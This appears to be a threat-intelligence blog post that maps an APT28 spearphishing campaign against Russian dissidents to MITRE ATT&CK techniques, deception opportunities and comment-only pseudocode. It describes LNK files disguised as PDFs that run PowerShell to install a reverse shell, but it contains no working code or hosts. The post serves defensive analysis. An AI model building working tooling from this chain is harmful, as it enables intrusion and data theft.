The Bear and the Shell

Subject: The Bear and the Shell

Tactics: TA0011 Command and Control, TA0005 Defense Evasion, TA0002 Execution, TA0010 Exfiltration, TA0001 Initial Access

Technique: T1071.001 Application Layer Protocol: Web Protocols, T1059.001 Command and Scripting Interpreter: PowerShell, T1041 Exfiltration Over C2 Channel, T1036 Masquerading, T1566.001 Phishing: Spearphishing Attachment

Procedure:

T1566.001 – Procedure: The adversary sent spearphishing emails to individuals and organizations critical of the Russian government, using lures such as NASA job offers and articles from independent Russian media outlets. The emails contained malicious ZIP files with LNK files disguised as PDFs. When opened, these executed a PowerShell script to install a reverse shell.

T1059.001 – Procedure: The LNK file, when opened, executes a PowerShell script that decodes and executes a Base64-encoded command. This command downloads and installs the HTTP-Shell, a multiplatform reverse shell.

T1036 – Procedure: The adversary used a NASA-themed lure and designed the command-and-control server to resemble a legitimate PDF editing site to avoid detection.

T1071.001 – Procedure: The HTTP-Shell uses web protocols (HTTP) to communicate with the command-and-control server, enabling the adversary to send commands and receive data.

T1041 – Procedure: The HTTP-Shell allows the adversary to upload and download files, likely facilitating the exfiltration of data from the victim’s machine over the established command-and-control channel.

Vulnerability: EAV0002 When adversaries interact with the environment or personas, they are vulnerable to collecting, or in some way interacting with, manipulated or decoy data. In those cases the data may increase their tolerance for imperfections in the environment and improve the overall believability of the ruse., EAV0007 When adversaries interact with engagement environments and personas, their future capability, targeting, and/or infrastructure requirements are vulnerable to influence.

Engagement Opportunity:

Organizations can use this opportunity to educate users about phishing threats, implement email security solutions to block malicious attachments, and set up a honeypot to capture the malicious emails and analyze the attacker’s techniques for improved detection and defense.

Threat Actor: APT28

Threat Objective:

To target entities critical of the Russian government and aligned with Russian dissident movements.

Deception Opportunity:

Create decoy email accounts or social media profiles that appear to belong to individuals or organizations critical of the Russian government. These decoys can be used to gather intelligence on the attacker’s techniques and objectives, and to potentially disrupt their operations.

Sensor Data Placement: Application

Observable Level: Core to Adversary-Brought Tool

Scoring Rationale:

The PowerShell script and the HTTP-Shell are specific to the attacker’s toolkit, making them “Core to Adversary-Brought Tool”. The sensor data placement is in both “Application” and “User-Mode” as the attack involves email attachments (application) and execution of scripts (user-mode).

Link to Report: https://www.google.com/url?sa=E&source=gmail&q=https://www.google.com/url?sa=E%26source=gmail%26q=https://blog.cluster25.duskrise.com/2024/01/30/russian-apt-opposition/

Link to Report II.:

Additional Comments:

The use of open-source tools and the attempt to blend in with legitimate web traffic indicate a sophisticated attacker with resources and an understanding of detection techniques.

Possible elements: Deceptive User Account with Canary Tokens

MSG (Pseudocode):

# Malicious Sub-Graph Standard

# Node Format:
# [Node ID]: [Tactic] - [Technique] - [Procedure] ([Observable Level])

# Edge Format:
# [Source Node ID] --> [Destination Node ID] ([Exploited Vulnerability])

[1]: Initial Access - Spearphishing Attachment - Send spearphishing email with malicious ZIP file containing LNK file disguised as PDF (Core to Adversary-Brought Tool)
[2]: Execution - Command and Scripting Interpreter: PowerShell - Execute PowerShell script to install HTTP-Shell (Core to Adversary-Brought Tool)
[3]: Defense Evasion - Masquerading - Use NASA-themed lure and C2 server disguised as PDF editing site (Core to Adversary-Brought Tool)
[4]: Command and Control - Application Layer Protocol: Web Protocols - Establish HTTP connection to C2 server (Core to Adversary-Brought Tool)
[5]: Exfiltration - Exfiltration Over C2 Channel - Exfiltrate data over HTTP C2 channel (Core to Sub-Technique or Technique)

1 --> 2 (Lack of User Awareness)
2 --> 3 (Lack of User Awareness)
3 --> 4 (Lack of Network Monitoring)
4 --> 5 (Lack of Network Monitoring)

# Pseudocode Standard

# Function Format:
# function [Tactic]_[Technique]([Input]):
# [Procedure]
# return [Output]

function Initial_Access_Spearphishing_Attachment(target_email):
# Craft spearphishing email with malicious ZIP file containing LNK file
# Send email to target_email
return malicious_lnk_file

function Execution_Command_and_Scripting_Interpreter(malicious_lnk_file):
# Execute PowerShell script embedded in LNK file
# Install HTTP-Shell
return reverse_shell

function Defense_Evasion_Masquerading(reverse_shell):
# Disguise C2 server as legitimate PDF editing site
return disguised_C2_server

function Command_and_Control_Application_Layer_Protocol(disguised_C2_server):
# Establish HTTP connection to disguised_C2_server
# Use C2 server for communication and data exfiltration
return exfiltrated_data

function Exfiltration_Exfiltration_Over_C2_Channel(exfiltrated_data):
# Send exfiltrated_data to C2 server over HTTP
return success

Leave a Reply Cancel reply

ORION Detlab: Forging Resilient Detections in the HEFAISTOS Ecosystem

The Maieutic Engine: Birth of a New Detection Engineering Paradigm

The Forge, The Guide, and The Hunter: Unifying Detection Engineering with the Mythological Triad of HEFAISTOS, KEDALION, and ORION

Dendrite: Bridging the Synaptic Gap Between External Intelligence and Internal Defense